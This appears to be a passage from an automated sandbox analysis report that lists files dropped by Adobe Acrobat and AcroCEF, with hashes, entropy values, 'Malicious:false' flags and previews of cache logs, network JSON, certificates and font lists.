                                                            Preview:./R......................................;...{...5...|S..7...|...........7...|...7...|.......7...|...................$...7...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):290
                                                            Entropy (8bit):5.257550821670414
                                                            Encrypted:false
                                                            SSDEEP:6:FdZj3cM+q2PFi2nKuAl9OmbnIFUt8cdJNF3JZmw+cdJtUScMVkwOFi2nKuAl9Omt:FdpcM+vdZHAahFUt8cdJnJ/+cdJtUScg
                                                            MD5:3EFB81B6E06AD70E2C7AAE7CEFFB4D96
                                                            SHA1:07EF64AFCD5C56B6E7CC3BFB136FB724552CE15C
                                                            SHA-256:577F21577BA776E18A23ADB1A6042EF74688E0B46BABD63AAF78F88ED6194EC5
                                                            SHA-512:0A493F03CCA9F13C501A3FD7BDBAFDC08302AAF0D0D97F46E5DACEAF55086196BD2894ADA9EAB6F1323BD95AC1B8A7E6EB11339B7F7B98C21FDD23B9D8BC7367
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.367 168c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:53:03.415 168c Recovering log #3.2024/12/06-09:53:03.466 168c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):290
                                                            Entropy (8bit):5.257550821670414
                                                            Encrypted:false
                                                            SSDEEP:6:FdZj3cM+q2PFi2nKuAl9OmbnIFUt8cdJNF3JZmw+cdJtUScMVkwOFi2nKuAl9Omt:FdpcM+vdZHAahFUt8cdJnJ/+cdJtUScg
                                                            MD5:3EFB81B6E06AD70E2C7AAE7CEFFB4D96
                                                            SHA1:07EF64AFCD5C56B6E7CC3BFB136FB724552CE15C
                                                            SHA-256:577F21577BA776E18A23ADB1A6042EF74688E0B46BABD63AAF78F88ED6194EC5
                                                            SHA-512:0A493F03CCA9F13C501A3FD7BDBAFDC08302AAF0D0D97F46E5DACEAF55086196BD2894ADA9EAB6F1323BD95AC1B8A7E6EB11339B7F7B98C21FDD23B9D8BC7367
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.367 168c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:53:03.415 168c Recovering log #3.2024/12/06-09:53:03.466 168c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):334
                                                            Entropy (8bit):5.188712931745028
                                                            Encrypted:false
                                                            SSDEEP:6:FdLo9yq2PFi2nKuAl9Ombzo2jMGIFUt8cdLu1Zmw+cdLcNRkwOFi2nKuAl9Ombzz:Fdk9yvdZHAa8uFUt8cdU/+cdANR5wZHA
                                                            MD5:A8F7803ED0464F66FD238B058464BE4E
                                                            SHA1:292EDA8FAE66465D27BD0F182BE54084A867A906
                                                            SHA-256:68DE7026214C29FAAAE10D4129C1098A11B4F95748F333DA7E0F8CA2ED92BA52
                                                            SHA-512:2C8262A239DCEE27F0EBDF0CD3FEB51904C0B53947178BA8DD20AE3D0DDFC43AB13952F7F391486D788F8770A79215E0EC60C869E031C8294DEDF22BC837CD65
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.615 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:53:03.619 1e70 Recovering log #3.2024/12/06-09:53:03.620 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):334
                                                            Entropy (8bit):5.188712931745028
                                                            Encrypted:false
                                                            SSDEEP:6:FdLo9yq2PFi2nKuAl9Ombzo2jMGIFUt8cdLu1Zmw+cdLcNRkwOFi2nKuAl9Ombzz:Fdk9yvdZHAa8uFUt8cdU/+cdANR5wZHA
                                                            MD5:A8F7803ED0464F66FD238B058464BE4E
                                                            SHA1:292EDA8FAE66465D27BD0F182BE54084A867A906
                                                            SHA-256:68DE7026214C29FAAAE10D4129C1098A11B4F95748F333DA7E0F8CA2ED92BA52
                                                            SHA-512:2C8262A239DCEE27F0EBDF0CD3FEB51904C0B53947178BA8DD20AE3D0DDFC43AB13952F7F391486D788F8770A79215E0EC60C869E031C8294DEDF22BC837CD65
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.615 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:53:03.619 1e70 Recovering log #3.2024/12/06-09:53:03.620 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:modified
                                                            Size (bytes):476
                                                            Entropy (8bit):4.980180404041981
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqtOXhsBdOg2Hicaq3QYiubpP7E4TX:Y2sRdsFXydMHt3QYhbd7n7
                                                            MD5:86572CC1C1C2CE31CF006CBF404F4280
                                                            SHA1:37D862AE0AD2BECDEC39931817F5C28ECF722825
                                                            SHA-256:B9C85BA49DAACA2939585AC8DF8DB04D7771493A8155E8CE53A03ADD2BAB70F7
                                                            SHA-512:07B21D9C72C85F372015A67FA0765AEB8A7909DEDCB89AB2C419493AB058D5DED76BC00ABC4DC4240F526D087393579C517D425B06E80E974E031B3EA3F50C62
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056792238736","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":652924},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):476
                                                            Entropy (8bit):4.962905575204746
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                            MD5:F371FDA655516B50D489FC8CFB1306C9
                                                            SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                            SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                            SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):476
                                                            Entropy (8bit):4.962905575204746
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                            MD5:F371FDA655516B50D489FC8CFB1306C9
                                                            SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                            SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                            SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):476
                                                            Entropy (8bit):4.962905575204746
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                            MD5:F371FDA655516B50D489FC8CFB1306C9
                                                            SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                            SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                            SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3878
                                                            Entropy (8bit):5.2262130939836515
                                                            Encrypted:false
                                                            SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVCJjiE:wshFT0h7cZb2EVKZPEANcGIK5EVCJj7
                                                            MD5:555E0240702CF764F039D81F7904F18E
                                                            SHA1:2853D4E46BEB41DBE46B6E34D13BA6F04975675C
                                                            SHA-256:4932A9FD109FE5CAE9FE1359E786C2C16292829569D2BA0CAB1832840CDE86D5
                                                            SHA-512:36435757BB17F26FD30B110FFFDDE789E141645354573D95C17B2145A4F86172A5F7674D97FFEDFFC0CE6C9EF745599D2F49C53BBE55BC586FEF60075C1FBC67
                                                            Malicious:false
                                                            Preview:*...#................version.1..namespace-#..o................next-map-id.1.Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/.0..QRr................next-map-id.2.Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.1....r................next-map-id.3.Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/.2%e.o................next-map-id.4.Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/.3nU..^...............Pnamespace-03b00fbd_48ad_47b1_8693_0d5562b6d54b-https://rna-resource.acrobat.com/"..C^...............Pnamespace-285943ad_4ed5_46fb_8713_f1874054bf05-https://rna-resource.acrobat.com/....a...............Snamespace-9efb0a2e_bf8a_4008_b12a_325311a763d0-https://rna-v2-resource.acrobat.com/.+;|a...............Snamespace-493a2582_fd2f_403f_a0b6_bf623eaab337-https://rna-v2-resource.acrobat.com/....o................next-map-id.5.Pnamespace-10b75d2f_11e7_4fa3_ae23_
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):322
                                                            Entropy (8bit):5.194926894991962
                                                            Encrypted:false
                                                            SSDEEP:6:Fd+NlFlyq2PFi2nKuAl9OmbzNMxIFUt8cd+7z1Zmw+cd+glRkwOFi2nKuAl9Ombg:FdQyvdZHAa8jFUt8cdK/+cdZlR5wZHAo
                                                            MD5:CFB941B42665161AB9E585092480A19A
                                                            SHA1:54FCC8A4E8BFE81A100882839726DDE03CF9357D
                                                            SHA-256:39B2867E5D25AEFC638A4BDED284FEFE76CFE6980B0F7405291DFA168508EAB0
                                                            SHA-512:F00B7C340F75E7037B17BC548F8FA018B04C97715E35905A8CC2378F6B9FC291396DF6A49619F914C8CDCAAC483B49AA7FF9DA234DDED62DBBF7B8F678E6963C
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:04.003 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:53:04.041 1e70 Recovering log #3.2024/12/06-09:53:04.068 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):322
                                                            Entropy (8bit):5.194926894991962
                                                            Encrypted:false
                                                            SSDEEP:6:Fd+NlFlyq2PFi2nKuAl9OmbzNMxIFUt8cd+7z1Zmw+cd+glRkwOFi2nKuAl9Ombg:FdQyvdZHAa8jFUt8cdK/+cdZlR5wZHAo
                                                            MD5:CFB941B42665161AB9E585092480A19A
                                                            SHA1:54FCC8A4E8BFE81A100882839726DDE03CF9357D
                                                            SHA-256:39B2867E5D25AEFC638A4BDED284FEFE76CFE6980B0F7405291DFA168508EAB0
                                                            SHA-512:F00B7C340F75E7037B17BC548F8FA018B04C97715E35905A8CC2378F6B9FC291396DF6A49619F914C8CDCAAC483B49AA7FF9DA234DDED62DBBF7B8F678E6963C
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:04.003 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:53:04.041 1e70 Recovering log #3.2024/12/06-09:53:04.068 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                            Category:dropped
                                                            Size (bytes):86016
                                                            Entropy (8bit):4.438911817338383
                                                            Encrypted:false
                                                            SSDEEP:384:yejci5GiiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0SurVgazUpUTTGt
                                                            MD5:A24CA2DA68A4573A248FDFECD3A4712D
                                                            SHA1:819AA8720B62F43CF43148A32788EBAB050BE934
                                                            SHA-256:AA6FDD1FA279F750CF0B5A16E7B065D623ECDE1ED3DCFD31E7AFFCC87A486DD2
                                                            SHA-512:409EACF4EAC6CF6941F53D7209E1AF88D7637CE56E52412C5517C06C7E617D572EDF0ACA3A667F84904D32600A16107D1A36F1C2AFEF07C20B46D96E17BA1179
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite Rollback Journal
                                                            Category:dropped
                                                            Size (bytes):8720
                                                            Entropy (8bit):3.775002245407451
                                                            Encrypted:false
                                                            SSDEEP:48:7MAp/E2ioyVlioy5oWoy1CUoy1BKOioy1noy1AYoy1Wioy1hioybioyRoy1noy14:7bpjulJEXKQk8b9IVXEBodRBkR
                                                            MD5:4536610AA688A494A69A20C6EF70B9C5
                                                            SHA1:16A87449C1F7FAC6B799A4AE12C546C69671F060
                                                            SHA-256:616AEE7E72063A7AE7A0B98B78776518E23AD6EFE2529492914C1DE94876B489
                                                            SHA-512:FB208E4684CBED8CCFCB95D05CD4B7D83ED65CB1470D3E90E0EDFE9BA140B17340717A3ACE1D72F3CCD73D3E0024285D8B8DD78CB12EE38DBCC9231FE72D1727
                                                            Malicious:false
                                                            Preview:.... .c......-*|...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:Certificate, Version=3
                                                            Category:dropped
                                                            Size (bytes):1391
                                                            Entropy (8bit):7.705940075877404
                                                            Encrypted:false
                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                            Malicious:false
                                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                            Category:dropped
                                                            Size (bytes):71954
                                                            Entropy (8bit):7.996617769952133
                                                            Encrypted:true
                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                            Malicious:false
                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):192
                                                            Entropy (8bit):2.775162490582081
                                                            Encrypted:false
                                                            SSDEEP:3:kkFkloi9WLlXfllXlE/HT8kyRu1NNX8RolJuRdxLlGB9lQRYwpDdt:kKxoWL2T8YNMa8RdWBwRd
                                                            MD5:71B3A7A9426B5C8365C26A70EE066D79
                                                            SHA1:35A4CB9662BE5476255C7132F2C55115A42954C9
                                                            SHA-256:1809BAA260216A02ED6AFD7C60E5ACAD512D1ADADF23552A3DC7F89EDC39AC91
                                                            SHA-512:6AB2FC7B4CFC2DAC7382CB3632A7D8E5A9C3BFD55B05694CF7A93AFE604A940097109C46932BBBA071CF7307C72427906F967DF7FC8ADD3FD328AC3686D4928F
                                                            Malicious:false
                                                            Preview:p...... ........[....G..(....................................................... ..........W.....4..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328
                                                            Entropy (8bit):3.247897867253901
                                                            Encrypted:false
                                                            SSDEEP:6:kKZlD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:eDImsLNkPlE99SNxAhUe/3
                                                            MD5:CD59C006FFF77242B6A183C306071D76
                                                            SHA1:F52CBEAFB02CED0E6C8AAFF92496680521F0126C
                                                            SHA-256:BAA410662023700470FCD7D9252D356983AC353CB38C8F49A0EE8C66AE0A0440
                                                            SHA-512:8B45B8DD9F7AEED0880AF43F2AC80A3ECD07AB49EBF063191C02D3FA2E4D7AD59C9AA6F923B99553EDB1541D0657EE18FE08916BE98BD376A64C4D883C51CCCC
                                                            Malicious:false
                                                            Preview:p...... .............G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):1233
                                                            Entropy (8bit):5.233980037532449
                                                            Encrypted:false
                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                            Malicious:false
                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):1233
                                                            Entropy (8bit):5.233980037532449
                                                            Encrypted:false
                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                            Malicious:false
                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):1233
                                                            Entropy (8bit):5.233980037532449
                                                            Encrypted:false
                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                            Malicious:false
